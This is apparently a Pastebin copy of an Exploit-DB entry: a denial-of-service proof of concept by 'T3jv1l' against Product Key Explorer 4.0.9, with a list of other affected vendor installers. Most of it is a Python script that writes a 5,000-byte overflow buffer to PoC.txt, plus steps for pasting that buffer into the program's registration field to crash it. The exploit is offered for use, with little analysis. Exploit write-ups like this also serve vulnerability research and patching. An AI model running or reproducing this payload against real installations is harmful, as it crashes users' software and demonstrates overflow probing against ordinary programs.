TVT618

EDB-ID-46057

Dec 29th, 2018
455
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
  2. # Date: 2018-12-25
  3. # Exploit Author: T3jv1l
  4. # Vendor Homepage: :http://www.nsauditor.com
  5. # Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
  6. # Contact: https://twitter.com/T3jv1l
  7. # Version:  Product Key Explorer 4.0.9
  8. # Tested on: Windows 7 SP1 x86
  9.  
  10. # Other affected software from the vendor
  11. # Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
  12. # Software: http://www.nsauditor.com/downloads/apkf_setup.exe
  13. # Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
  14. # Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
  15. # Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
  16. # Software: http://www.nsauditor.com/downloads/spotie_setup.exe
  17. # Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
  18. # Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
  19. # Software: http://www.nsauditor.com/downloads/nsi_setup.exe
  20. # Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
  21. # Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
  22. # Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
  23. # Software: http://www.nsauditor.com/downloads/dnss_setup.exe
  24.  
  25. # PoC:
  26. # 1.  Download and install the setup file
  27. # 2.  A file "PoC.txt" will be created
  28. # 3.  Click Help > Register... in tool bar
  29. # 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field
  30. # 5.  Click OK and BOOMMMM !!!!
  31.  
  32. #!/usr/bin/python
  33.  
  34. buffer = "\x41" * 2000
  35. buffer += "\x42" * 2000
  36. buffer += "\x43" * 1000
  37.  
  38. payload = buffer
  39. try:
  40.     f=open("PoC.txt","w")
  41.     print "[+] Creating %s bytes payload..." %len(payload)
  42.     f.write(payload)
  43.     f.close()
  44.     print "[+] File created!"
  45. except:
  46.     print "File cannot be created"
RAW Paste Data